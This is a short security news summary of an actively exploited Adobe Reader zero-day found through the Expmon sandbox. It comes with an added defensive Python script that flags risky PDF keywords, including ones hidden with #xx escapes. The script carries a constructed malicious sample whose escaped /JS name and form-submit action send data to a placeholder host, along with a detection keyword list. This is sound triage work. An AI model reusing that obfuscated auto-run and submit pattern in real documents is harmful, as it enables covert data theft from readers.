Researcher Haifei Li detected an actively exploited zero-day in Adobe Reader using his Expmon sandbox, identifying a malicious PDF that collects and exfiltrates system data and may enable sandbox escape and remote code execution. The exploit works against the latest Reader build, samples were submitted to Expmon and VirusTotal, and Adobe was notified as the investigation continues. #AdobeReader #Expmon #VirusTotal #HaifeiLi
Keypoints
- A zero-day Adobe Reader exploit was detected by Haifei Li using the Expmon sandbox.
- The malicious PDF collects and leaks various system and user data and may precede RCE and sandbox escape attempts.
- The exploit is effective against the latest Adobe Reader version and samples were uploaded to Expmon and VirusTotal.
- One VirusTotal sample dates to November 2025, suggesting the vulnerability has been exploited for months.
- Li could not reproduce the full attack chain or additional payloads, and Adobe has been notified for assessment.
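The article does not describe how the PDF harvests data, which Reader component it abuses, or what the exploit chain looks like, so nothing below models that sample. What a defender can do right away with a suspect PDF is the static triage step that usually precedes sandboxing: count the action and script keywords that give a document the ability to run code or reach the network, and do so after decoding the #xx name escapes that malware uses to hide them. The following is an added example written for this page, not code from the article, from Expmon, or from the researcher; the two PDFs are constructed for illustration, the keyword list is a generic pdfid-style list, and the URL in the sample is a placeholder.

```python
import re

# Generic triage list (pdfid-style); not derived from the sample in the article.
RISKY_KEYWORDS = (
    "/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch", "/URI",
    "/SubmitForm", "/EmbeddedFile", "/RichMedia", "/ObjStm", "/AcroForm", "/XFA",
)
# Keywords that alone justify detonating the file in a sandbox.
HIGH_RISK = {"/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch", "/SubmitForm"}

# PDF names may spell any byte as #xx, e.g. /J#53 for /JS.
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# A name ends at whitespace or a PDF delimiter, so /JS must not match /JSX.
_NAME_END = rb"(?=[\s()<>\[\]{}/%]|$)"


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes so obfuscated names match their plain spelling."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> dict:
    """Count each risky keyword as a complete PDF name in the given bytes."""
    return {
        kw: len(re.findall(re.escape(kw.encode()) + _NAME_END, data))
        for kw in RISKY_KEYWORDS
    }


def triage(data: bytes) -> dict:
    """Static triage: keyword counts after de-obfuscation, whether any
    keyword was hidden behind #xx escapes, and a coarse verdict."""
    raw = count_keywords(data)
    norm = count_keywords(normalize_names(data))
    obfuscated = any(norm[kw] > raw[kw] for kw in RISKY_KEYWORDS)
    suspicious = obfuscated or any(norm[kw] > 0 for kw in HIGH_RISK)
    return {"counts": norm, "obfuscated_names": obfuscated, "suspicious": suspicious}


# Constructed sample: JavaScript run on open (with the /JS name escaped as
# /J#53) plus a page-open action that submits form data to a placeholder URL.
SAMPLE_MALICIOUS = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 5 0 R >> >> endobj
4 0 obj << /S /JavaScript /J#53 (app.alert(this.info);) >> endobj
5 0 obj << /S /SubmitForm /F << /FS /URL /F (http://example.invalid/collect) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: a plain one-page document with no actions or scripts.
SAMPLE_BENIGN = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, pdf in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        result = triage(pdf)
        hits = {k: v for k, v in result["counts"].items() if v}
        print(f"{label}: suspicious={result['suspicious']} "
              f"obfuscated_names={result['obfuscated_names']} hits={hits}")
```

Counts are taken on the de-obfuscated bytes, and a keyword that appears only after decoding is itself treated as a signal, since a legitimately produced PDF has no reason to escape /JS. This is a triage filter, not a verdict: a zero-day like the one described may live in a parser path that uses none of these keywords, so a clean count lowers priority rather than clearing the file, and anything flagged should go to a sandbox such as the one the article describes.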
Read More: https://www.securityweek.com/adobe-reader-zero-day-exploited-for-months-researcher/